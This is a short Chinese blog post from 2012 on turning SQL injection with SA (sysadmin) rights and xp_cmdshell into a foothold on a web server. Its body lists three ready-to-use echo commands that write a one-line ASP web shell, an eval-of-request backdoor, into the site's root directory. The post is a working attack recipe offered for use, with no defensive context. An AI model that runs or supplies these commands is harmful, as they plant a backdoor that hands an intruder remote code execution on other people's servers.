SA权限ECHO写一句话

2012年1月17日热度：20 ℃ 发表评论阅读评论

注入点是SA权限.
xp_cmdshell是存在的.
找到网站主目录 dir d:\wwwroot
找到站点的目录后.

1
2
3

Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp
echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp
echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp

声明: 本文采用 BY-NC-SA 协议进行授权. 转载请注明转自: SA权限ECHO写一句话

phpshell写入启动项提权jQuery图片特效，鼠标经过图标高亮显示

评论 (0) Trackbacks (0) 发表评论 Make a trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

SA权限ECHO写一句话

SA提权, 一句话木马, 提权, 木马